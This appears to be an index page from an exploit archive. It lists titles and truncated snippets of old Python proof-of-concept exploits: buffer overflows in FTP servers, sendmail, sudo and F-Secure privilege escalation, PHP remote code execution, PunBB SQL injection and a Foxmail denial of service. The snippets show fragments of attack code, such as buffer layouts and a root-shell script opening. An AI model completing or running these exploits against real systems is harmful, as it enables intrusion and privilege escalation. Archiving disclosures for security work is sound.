WFTPD Pro Server 3.23.1.1 - APPE Remote Buffer Overflow (PoC)

WFTPD Pro Server 3.23.1.1 - APPE Remote Buffer Overflow PoC !/usr/bin/env python import sys import struct import ftplib print "WFTPD Pro Server 3.23.1.1 Buffer Overflow Only a DOS currently, simple POC" print "Copyright c Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp =...

Easy File Sharing FTP Server 2.0 - 'PASS' Remote

!/usr/bin/python Easy File Sharing FTP Server 2.0 PASS 0day PoC exploit Proof of Concept: execute calc.exe Bug found by h07 Tested on XP SP2 polish Date: 28.07.2006 BUFFPASS + 0x20+0x2c+NOP 2571+0x41414141+\r\n EIP = 0x41414141 host = "127.0.0.1" port = 21 lenrecv = 1024 username = "anonymous"...

Sendmail 8.13.5 - Remote Signal Handling (PoC)

Sendmail 8.13.5 - Remote Signal Handling PoC !/usr/bin/env python [email protected] Sendmail 8.13.5 and below Remote Signal Handling exploit usage: rbl4ck-sendmail.py 127.0.0.1 0 25 this exploit was leaked to the PHC Phrack High Council so instead of only letting them have a copy, we figu...

rocksumountdirty.txt

!/usr/bin/env python rocksumountdirty.py: Rocks release =4.1 local root exploit quick and nasty version of the exploit. make sure the . is writable and you clean up afterwards. ; coded by: [email protected] http://xavsec.blogspot.com x=import'os';c=x.getcwd open'%s/x'%c, 'a'.write"!/bin/sh\ncp...

Back-end0721.txt

/ Federico Fazzi, / Back-end = 0.7.2.1 jpcache.php Remote command execution / 08/06/2006 1:04 Bug: jpcache.php: line 40 --- $includedir = $PSL'classdir' . "/jpcache"; --- Proof of concept: Back-end have a default path pre-set on jpcache.php, and cracker can execute a remote command...

freesshd-exploit.txt

!/usr/bin/env python """ Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0 ahmadtauqeeratyahoo.com Disclaimer: This Proof of concept exploit is for educational purpose only. Please do not use it against any system without prior permission. You are responsible for yourself for what you do with this cod...

Code injection

sudo 1.6.8 and other versions does not clear the PYTHONINSPECT environment variable, which allows limited local users to gain privileges via a Python script, a variant of CVE-2005-4158...

CVE-2006-0151

sudo 1.6.8 and other versions does not clear the PYTHONINSPECT environment variable, which allows limited local users to gain privileges via a Python script, a variant of CVE-2005-4158...

Sudo 1.6.x - Environment Variable Handling Security Bypass (2)

Sudo 1.6.x - Environment Variable Handling Security Bypass 2 source: https://www.securityfocus.com/bid/16184/info Sudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables. A...

F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation

!/usr/bin/env python F-Secure Anti-Virus Internet Gatekeeper for Linux " lastedit = "Thu Sep 22 23:18:39 EDT 2005" usage = """usage: %s -options options: --version show program's version number and exit. -h, --help show this help message and exit...

xmlrpc.py.txt

!/usr/bin/python ./xmlrpc.py chk|xpl host uri example check bug: ./xmlrpc.py chk www.postnuke.com /xmlrpc.php example exploit bug: ./xmlrpc.py xpl www.postnuke.com /xmlrpc.php Pear XML-RPC Library 1.3.0 Remote PHP Code Execution Exploit -- Not working for me so i made this python code...

PunBB 1.2.4 (change_email) SQL Injection Exploit

Exploit for unknown platform in category web applications ================================================ PunBB 1.2.4 changeemail SQL Injection Exploit ================================================ !/usr/bin/python | || | | | | | | | || || \ | |/ || '|/ |/ -| ' \ / -/ |||| /| || / ||||,|||...

Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit

No description provided by source. !/usr/bin/python Code by OYXin oyxinatsegfault.cn import socket import sys import getopt def usage: print "Usage: foxserver.py -h host -p port" sys.exit0 if name == 'main': try: opts, args = getopt.getoptsys.argv1:, "h:p:" except getopt.GetoptError, msg: print m...

Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit

Exploit for unknown platform in category dos / poc ================================================== Foxmail 2.0 MAIL FROM: Denial of Service Exploit ================================================== !/usr/bin/python Code by OYXin oyxinatsegfault.cn import socket import sys import getopt def...

[Full-Disclosure] Icecast 2.0.0 preauth overflow

There exists a remotely exploitable heap overflow in Icecast 2.0.0. The bug exists in the handling of base64 Authorization request. This bug was found in about 40 seconds during a HTTP audit of the web component of Icecast with the fuzzer SMUDGE http://felinemenace.org/nd/SMUDGE/ People complaine...